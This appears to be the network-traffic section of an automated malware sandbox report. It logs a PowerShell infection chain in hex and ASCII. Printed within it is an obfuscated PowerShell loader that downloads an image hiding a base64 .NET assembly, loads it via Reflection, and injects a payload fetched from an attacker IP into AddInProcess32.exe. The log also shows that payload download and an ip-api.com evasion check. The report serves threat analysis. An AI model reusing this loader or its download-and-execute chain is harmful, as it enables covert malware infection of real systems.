76 6c 69 6e 27 2b 27 6b 41 6d 61 20 2d 46 6f 72 65 67 72 6f 75 6e [TRUNCATED]
                  Data Ascii: .( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::
                  Jul 2, 2024 08:22:11.705612898 CEST174INData Raw: 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 74 30 76 62 61 73 65 36 34 43 27 2b 27 6f 6d 6d 61 6e 64 29 3b 20 74 30 76 6c 6f 61 64 65 64 41 73 73 65 6d 62 6c 79 20 3d 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 27 2b
                  Data Ascii: FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma)
                  Jul 2, 2024 08:22:11.705622911 CEST1236INData Raw: 3b 20 74 30 76 6d 65 74 68 6f 64 20 3d 20 74 30 76 74 79 70 65 2e 47 65 74 4d 65 74 68 6f 64 28 41 6d 61 56 41 49 41 6d 61 29 2e 49 6e 76 6f 6b 65 28 74 27 2b 27 30 76 6e 75 6c 6c 2c 20 5b 6f 62 6a 65 63 74 5b 5d 5d 20 28 41 6d 61 74 78 74 2e 65
                  Data Ascii: ; t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptbloc
                  Jul 2, 2024 08:22:11.705746889 CEST396INData Raw: 6f 61 64 28 74 30 76 63 6f 6d 6d 61 6e 64 42 79 74 65 73 29 3b 20 74 30 76 74 79 70 65 20 3d 20 74 30 76 6c 6f 61 64 65 64 41 73 73 65 6d 62 6c 79 2e 27 2b 27 47 65 74 54 79 70 65 28 41 6d 61 52 75 6e 50 45 2e 48 6f 6d 65 41 6d 61 29 3b 20 74 30
                  Data Ascii: oad(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , Amade
                  Jul 2, 2024 08:22:11.919759989 CEST396INData Raw: 6f 61 64 28 74 30 76 63 6f 6d 6d 61 6e 64 42 79 74 65 73 29 3b 20 74 30 76 74 79 70 65 20 3d 20 74 30 76 6c 6f 61 64 65 64 41 73 73 65 6d 62 6c 79 2e 27 2b 27 47 65 74 54 79 70 65 28 41 6d 61 52 75 6e 50 45 2e 48 6f 6d 65 41 6d 61 29 3b 20 74 30
                  Data Ascii: oad(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , Amade


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.2249164192.3.243.156802200C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 08:22:14.567187071 CEST85OUTGET /ourTraditionalbase.txt HTTP/1.1
                  Host: 192.3.243.156
                  Connection: Keep-Alive
                  Jul 2, 2024 08:22:15.170011997 CEST1236INHTTP/1.1 200 OK
                  Content-Type: text/plain
                  Last-Modified: Mon, 01 Jul 2024 14:41:04 GMT
                  Accept-Ranges: bytes
                  ETag: "30b179b3c4cbda1:0"
                  Server: Microsoft-IIS/10.0
                  Date: Tue, 02 Jul 2024 06:22:15 GMT
                  Content-Length: 325632
                  Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8DEAAAAMAwAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgCN4TesJWblN3ch9CPK0gPvZmbJR3c1JHdvwDIgoQD+kHdpJXdjV2cvwDIgACIK0gPzV2ZlxWa2lm
                  Jul 2, 2024 08:22:15.170038939 CEST1236INData Raw: 63 51 52 57 5a 30 4e 58 5a 31 46 58 5a 79 39 43 50 67 41 43 49 67 41 43 49 4b 30 67 50 76 49 53 5a 7a 78 57 59 6d 4a 53 50 7a 4e 58 5a 6a 4e 57 51 70 56 48 49 69 49 58 5a 72 39 6d 64 75 6c 30 63 68 4a 53 50 73 56 6d 64 6c 78 47 49 73 56 6d 64 6c
                  Data Ascii: cQRWZ0NXZ1FXZy9CPgACIgACIK0gPvISZzxWYmJSPzNXZjNWQpVHIiIXZr9mdul0chJSPsVmdlxGIsVmdlxkbvlGd1NWZ4VEZlR3clVXclJHPgACIgACIgAiCN4jIzYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegMXZnVGbpZXayBFZlR3clVXclJHPgACIgACIK0gP5RXayV3YlNHPgACIgoQD+IiM25
                  Jul 2, 2024 08:22:15.170052052 CEST448INData Raw: 41 77 41 41 4d 41 45 41 41 41 45 41 2b 41 41 41 41 76 42 67 5a 41 34 47 41 4a 42 51 5a 41 77 47 41 70 42 67 52 41 63 47 41 75 42 51 61 41 49 48 41 30 42 77 55 41 45 41 41 41 49 41 48 45 41 4c 41 41 41 41 41 41 41 41 41 75 42 77 62 41 6b 47 41 30
                  Data Ascii: AwAAMAEAAAEA+AAAAvBgZA4GAJBQZAwGApBgRAcGAuBQaAIHA0BwUAEAAAIAHEALAAAAAAAAAuBwbAkGA0BQYAwGAzBgbAEGAyBAVAAAAEAAJAAAAAAwbAYGAuBQSAUGAsBQaAYEAyBQYAYFABAAAAQEAAAAAAAAAAAAAAAAAAAQAAAAAEAAAAAAAAAwPAAAAAAQAAAAAAAAAAEAAAAQAAAg/vTQvAAAAAAwTAYEAOBQSA8FAOB
                  Jul 2, 2024 08:22:15.170062065 CEST1236INData Raw: 41 51 42 41 41 41 67 42 67 41 41 41 49 41 41 41 41 51 41 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                  Data Ascii: AQBAAAgBgAAAIAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                  Jul 2, 2024 08:22:15.170078039 CEST1236INData Raw: 42 64 51 77 42 49 77 68 41 42 41 41 42 49 55 55 67 53 34 51 73 43 4b 68 44 68 4c 6f 45 47 63 67 44 4f 6b 75 67 53 45 41 49 47 55 75 67 53 41 41 49 46 67 51 73 43 4b 52 41 31 4b 6f 45 56 34 51 73 43 4b 52 50 42 4b 52 34 43 4b 68 44 48 63 67 46 4a
                  Data Ascii: BdQwBIwhABAABIUUgS4QsCKhDhLoEGcgDOkugSEAIGUugSAAIFgQsCKRA1KoEV4QsCKRPBKR4CKhDHcgFJCoEAAQBO0SgS0RAAcACI0SgS0RLBKRLBKRHI4wBHERgAKRHAAgBhERIRIgAAcACBCoEdgwAHgAATgQACAiBA4RA9JRFGAgHBktgSUxBIAgHIUQHIUtgSYwBMEsgSAAIF0sgSEQAgYQzCKBAAUgDFLoEBAgBI4gDVG
                  Jul 2, 2024 08:22:15.170088053 CEST1236INData Raw: 48 41 47 6f 45 64 41 59 67 53 30 42 67 42 4b 42 43 46 30 42 43 41 47 6f 45 4e 63 51 4a 49 55 51 48 43 63 51 42 49 45 6f 67 53 49 77 42 47 67 51 66 43 4b 68 41 48 59 67 44 42 55 57 67 53 55 68 44 4f 49 41 41 4b 67 51 65 53 6b 66 67 53 34 51 48 74
                  Data Ascii: HAGoEdAYgS0BgBKBCF0BCAGoENcQJIUQHCcQBIEogSIwBGgQfCKhAHYgDBUWgSUhDOIAAKgQeSkfgS4QHtGoEOEQTSUhBHIBCI4QHOEQTSUhDI4gDO0BWBKhDB0kEVswBZgAbBKBbBKRANJRFDcQDL4QAAQAXBGRAKUQdCGhCBAgBkFYEBoQBIcACIcACIgACKoACIsAXBGRHIgACIMxBYgwAdgACI4QHIgACJcQDgFYEBoQBN0
                  Jul 2, 2024 08:22:15.170094013 CEST1236INData Raw: 44 42 30 6b 45 56 73 77 42 6b 67 67 44 42 45 4f 67 52 55 42 51 42 4b 68 44 4f 45 51 54 53 55 42 51 42 4b 52 41 4e 4a 52 46 47 63 51 47 43 67 52 41 43 41 53 42 49 67 41 43 43 41 51 42 49 67 67 44 64 67 67 44 46 30 42 43 49 41 55 67 53 67 41 43 46
                  Data Ascii: DB0kEVswBkggDBEOgRUBQBKhDOEQTSUBQBKRANJRFGcQGCgRACASBIgACCAQBIggDdggDF0BCIAUgSgACF0RBdgSgS4QpBKBGOAUgSEQTSUxEHUyAOEAAEgwAdMQHI4QHD0BQBKhDO4gDO4QHO4AQBKRANJRFQcwHI4ACOgQBdUQHOgwBMggDOIQXSUhDCEcgRUBQBKhDQFoEOAUgSEQTSUxBH4BCAFoEB0kEVAUgS4gDOgACO4
                  Jul 2, 2024 08:22:15.170351982 CEST1236INData Raw: 48 49 67 51 48 49 67 41 43 49 30 42 43 64 34 77 44 48 67 42 43 49 55 51 48 49 4d 41 49 48 6f 41 43 42 41 41 42 78 49 59 45 74 49 59 45 70 49 59 45 4f 45 41 42 67 30 41 43 41 46 6f 45 42 45 4f 67 52 55 68 44 42 45 4f 67 52 55 68 44 42 45 4f 67 52
                  Data Ascii: HIgQHIgACI0BCd4wDHgBCIUQHIMAIHoACBAABxIYEtIYEpIYEOEABg0ACAFoEBEOgRUhDBEOgRUhDBEOgRUhDBEOgRUBQBKRANJRFAFoEC4ACIgACAFoEI4gACUQHIEigS4gDO4QANJRFO4QANJRFOEQTSUhDO4gDAFoEB0kEVEyBYhACO0BQBKRANJRFAFoEO4AHY0PgSwR/AKBGY0PgSgR/AKRIR0PgSgBHIgBGIgRIRwBCYg
                  Jul 2, 2024 08:22:15.170363903 CEST1236INData Raw: 44 64 41 55 67 53 45 51 54 53 55 42 51 42 4b 68 44 4f 34 67 44 6c 47 6f 45 4f 55 61 67 53 34 41 51 42 4b 52 41 4e 4a 52 46 4f 63 77 49 52 48 6f 45 41 41 53 42 49 55 51 48 4f 45 67 67 53 55 51 48 4e 48 6f 45 46 30 78 42 48 41 42 43 49 34 51 48 41
                  Data Ascii: DdAUgSEQTSUBQBKhDO4gDlGoEOUagS4AQBKRANJRFOcwIRHoEAASBIUQHOEggSUQHNHoEF0xBHABCI4QHAFoEF0RpBKhDlGoEOAUgSEQTSUhCHoBCI4QHAFoEB0kEVAUgS4gDdAUgSEQTSUBCHoBCAFoEB0kEVAUgS4QfBKhD9FoEO4gDO4AQBKRANJRFNcQIOUfgSEAIG0ZgS0BAgYgDdGoEdEAIHgACdGoEdgQnBKRHAFoEO4
                  Jul 2, 2024 08:22:15.170373917 CEST1236INData Raw: 42 47 67 77 41 42 41 41 42 46 30 68 41 4f 55 61 67 53 45 41 49 47 55 61 67 53 59 41 42 49 4d 51 48 44 30 78 41 64 67 67 44 64 67 67 44 64 67 67 44 64 34 51 48 41 46 6f 45 46 30 68 44 6c 47 6f 45 4f 55 61 67 53 34 51 70 42 4b 68 44 46 30 68 44 64
                  Data Ascii: BGgwABAABF0hAOUagSEAIGUagSYABIMQHD0xAdggDdggDdggDd4QHAFoEF0hDlGoEOUagS4QpBKhDF0hDdAUgSEQTSUxFHETnBKBAgUAAT0BAgUACI4QHI4QHAFoEO4gDIUQHYFoEOAUgSEQTSUhDOEQTSUhDRcAJO0ZgSEAAG4QAhDYEVYAChEBCO0hDBEOgRUBQBKRBd4gDC0lEVUQHO4gDdgZgS4AQBKRANJRFOEQTSUBEH8
                  Jul 2, 2024 08:22:15.174990892 CEST1236INData Raw: 67 52 55 42 43 41 4d 52 41 42 41 53 42 70 44 6f 45 41 41 51 42 4f 45 51 54 53 55 52 42 73 46 6f 45 42 45 4f 67 52 55 42 43 51 48 6f 45 42 30 6b 45 56 63 41 62 42 4b 52 41 4e 4a 52 46 48 67 51 64 52 34 51 48 51 48 6f 45 42 45 4f 67 52 55 42 62 42
                  Data Ascii: gRUBCAMRABASBpDoEAAQBOEQTSURBsFoEBEOgRUBCQHoEB0kEVcAbBKRANJRFHgQdR4QHQHoEBEOgRUBbBKRAhDYEVAdgSAdgSwWgSAdgSEQTSUBbBKRANJRFKcgLdIBAgQwAd4QAgUgDdIRAgUAATAAIEAUgSEQ4AGRFIAwEBEOgRUBAgkAQBKRANJRFHgwAdUXEO0BQBKRAhDYEVAUgS0hEAFoEB0kEVgwBd4gDO4gDEAwBIU


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.2249166208.95.112.1803000C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 08:22:16.125739098 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Connection: Keep-Alive
                  Jul 2, 2024 08:22:16.628196001 CEST174INHTTP/1.1 200 OK
                  Date: Tue, 02 Jul 2024 06:22:16 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 6
                  X-Rl: 43
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false
                  Jul 2, 2024 08:22:16.843653917 CEST174INHTTP/1.1 200 OK
                  Date: Tue, 02 Jul 2024 06:22:16 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 6
                  X-Rl: 43
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.2249167192.3.243.156802200C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 08:22:17.016139030 CEST61OUTGET /ourTraditionalbase.txt HTTP/1.1
                  Host: 192.3.243.156
                  Jul 2, 2024 08:22:17.620157957 CEST1236INHTTP/1.1 200 OK
                  Content-Type: text/plain
                  Last-Modified: Mon, 01 Jul 2024 14:41:04 GMT
                  Accept-Ranges: bytes
                  ETag: "30b179b3c4cbda1:0"
                  Server: Microsoft-IIS/10.0
                  Date: Tue, 02 Jul 2024 06:22:17 GMT
                  Content-Length: 325632
                  Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8DEAAAAMAwAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgCN4TesJWblN3ch9CPK0gPvZmbJR3c1JHdvwDIgoQD+kHdpJXdjV2cvwDIgACIK0gPzV2ZlxWa2lm
                  Jul 2, 2024 08:22:17.620182037 CEST1236INData Raw: 63 51 52 57 5a 30 4e 58 5a 31 46 58 5a 79 39 43 50 67 41 43 49 67 41 43 49 4b 30 67 50 76 49 53 5a 7a 78 57 59 6d 4a 53 50 7a 4e 58 5a 6a 4e 57 51 70 56 48 49 69 49 58 5a 72 39 6d 64 75 6c 30 63 68 4a 53 50 73 56 6d 64 6c 78 47 49 73 56 6d 64 6c
                  Data Ascii: cQRWZ0NXZ1FXZy9CPgACIgACIK0gPvISZzxWYmJSPzNXZjNWQpVHIiIXZr9mdul0chJSPsVmdlxGIsVmdlxkbvlGd1NWZ4VEZlR3clVXclJHPgACIgACIgAiCN4jIzYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegMXZnVGbpZXayBFZlR3clVXclJHPgACIgACIK0gP5RXayV3YlNHPgACIgoQD+IiM25
                  Jul 2, 2024 08:22:17.620188951 CEST448INData Raw: 41 77 41 41 4d 41 45 41 41 41 45 41 2b 41 41 41 41 76 42 67 5a 41 34 47 41 4a 42 51 5a 41 77 47 41 70 42 67 52 41 63 47 41 75 42 51 61 41 49 48 41 30 42 77 55 41 45 41 41 41 49 41 48 45 41 4c 41 41 41 41 41 41 41 41 41 75 42 77 62 41 6b 47 41 30
                  Data Ascii: AwAAMAEAAAEA+AAAAvBgZA4GAJBQZAwGApBgRAcGAuBQaAIHA0BwUAEAAAIAHEALAAAAAAAAAuBwbAkGA0BQYAwGAzBgbAEGAyBAVAAAAEAAJAAAAAAwbAYGAuBQSAUGAsBQaAYEAyBQYAYFABAAAAQEAAAAAAAAAAAAAAAAAAAQAAAAAEAAAAAAAAAwPAAAAAAQAAAAAAAAAAEAAAAQAAAg/vTQvAAAAAAwTAYEAOBQSA8FAOB
                  Jul 2, 2024 08:22:17.620320082 CEST1236INData Raw: 41 51 42 41 41 41 67 42 67 41 41 41 49 41 41 41 41 51 41 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                  Data Ascii: AQBAAAgBgAAAIAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                  Jul 2, 2024 08:22:17.620348930 CEST1236INData Raw: 42 64 51 77 42 49 77 68 41 42 41 41 42 49 55 55 67 53 34 51 73 43 4b 68 44 68 4c 6f 45 47 63 67 44 4f 6b 75 67 53 45 41 49 47 55 75 67 53 41 41 49 46 67 51 73 43 4b 52 41 31 4b 6f 45 56 34 51 73 43 4b 52 50 42 4b 52 34 43 4b 68 44 48 63 67 46 4a
                  Data Ascii: BdQwBIwhABAABIUUgS4QsCKhDhLoEGcgDOkugSEAIGUugSAAIFgQsCKRA1KoEV4QsCKRPBKR4CKhDHcgFJCoEAAQBO0SgS0RAAcACI0SgS0RLBKRLBKRHI4wBHERgAKRHAAgBhERIRIgAAcACBCoEdgwAHgAATgQACAiBA4RA9JRFGAgHBktgSUxBIAgHIUQHIUtgSYwBMEsgSAAIF0sgSEQAgYQzCKBAAUgDFLoEBAgBI4gDVG
                  Jul 2, 2024 08:22:17.620354891 CEST1236INData Raw: 48 41 47 6f 45 64 41 59 67 53 30 42 67 42 4b 42 43 46 30 42 43 41 47 6f 45 4e 63 51 4a 49 55 51 48 43 63 51 42 49 45 6f 67 53 49 77 42 47 67 51 66 43 4b 68 41 48 59 67 44 42 55 57 67 53 55 68 44 4f 49 41 41 4b 67 51 65 53 6b 66 67 53 34 51 48 74
                  Data Ascii: HAGoEdAYgS0BgBKBCF0BCAGoENcQJIUQHCcQBIEogSIwBGgQfCKhAHYgDBUWgSUhDOIAAKgQeSkfgS4QHtGoEOEQTSUhBHIBCI4QHOEQTSUhDI4gDO0BWBKhDB0kEVswBZgAbBKBbBKRANJRFDcQDL4QAAQAXBGRAKUQdCGhCBAgBkFYEBoQBIcACIcACIgACKoACIsAXBGRHIgACIMxBYgwAdgACI4QHIgACJcQDgFYEBoQBN0
                  Jul 2, 2024 08:22:17.620366096 CEST1236INData Raw: 44 42 30 6b 45 56 73 77 42 6b 67 67 44 42 45 4f 67 52 55 42 51 42 4b 68 44 4f 45 51 54 53 55 42 51 42 4b 52 41 4e 4a 52 46 47 63 51 47 43 67 52 41 43 41 53 42 49 67 41 43 43 41 51 42 49 67 67 44 64 67 67 44 46 30 42 43 49 41 55 67 53 67 41 43 46
                  Data Ascii: DB0kEVswBkggDBEOgRUBQBKhDOEQTSUBQBKRANJRFGcQGCgRACASBIgACCAQBIggDdggDF0BCIAUgSgACF0RBdgSgS4QpBKBGOAUgSEQTSUxEHUyAOEAAEgwAdMQHI4QHD0BQBKhDO4gDO4QHO4AQBKRANJRFQcwHI4ACOgQBdUQHOgwBMggDOIQXSUhDCEcgRUBQBKhDQFoEOAUgSEQTSUxBH4BCAFoEB0kEVAUgS4gDOgACO4
                  Jul 2, 2024 08:22:17.620490074 CEST1236INData Raw: 48 49 67 51 48 49 67 41 43 49 30 42 43 64 34 77 44 48 67 42 43 49 55 51 48 49 4d 41 49 48 6f 41 43 42 41 41 42 78 49 59 45 74 49 59 45 70 49 59 45 4f 45 41 42 67 30 41 43 41 46 6f 45 42 45 4f 67 52 55 68 44 42 45 4f 67 52 55 68 44 42 45 4f 67 52
                  Data Ascii: HIgQHIgACI0BCd4wDHgBCIUQHIMAIHoACBAABxIYEtIYEpIYEOEABg0ACAFoEBEOgRUhDBEOgRUhDBEOgRUhDBEOgRUBQBKRANJRFAFoEC4ACIgACAFoEI4gACUQHIEigS4gDO4QANJRFO4QANJRFOEQTSUhDO4gDAFoEB0kEVEyBYhACO0BQBKRANJRFAFoEO4AHY0PgSwR/AKBGY0PgSgR/AKRIR0PgSgBHIgBGIgRIRwBCYg
                  Jul 2, 2024 08:22:17.620501995 CEST1236INData Raw: 44 64 41 55 67 53 45 51 54 53 55 42 51 42 4b 68 44 4f 34 67 44 6c 47 6f 45 4f 55 61 67 53 34 41 51 42 4b 52 41 4e 4a 52 46 4f 63 77 49 52 48 6f 45 41 41 53 42 49 55 51 48 4f 45 67 67 53 55 51 48 4e 48 6f 45 46 30 78 42 48 41 42 43 49 34 51 48 41
                  Data Ascii: DdAUgSEQTSUBQBKhDO4gDlGoEOUagS4AQBKRANJRFOcwIRHoEAASBIUQHOEggSUQHNHoEF0xBHABCI4QHAFoEF0RpBKhDlGoEOAUgSEQTSUhCHoBCI4QHAFoEB0kEVAUgS4gDdAUgSEQTSUBCHoBCAFoEB0kEVAUgS4QfBKhD9FoEO4gDO4AQBKRANJRFNcQIOUfgSEAIG0ZgS0BAgYgDdGoEdEAIHgACdGoEdgQnBKRHAFoEO4
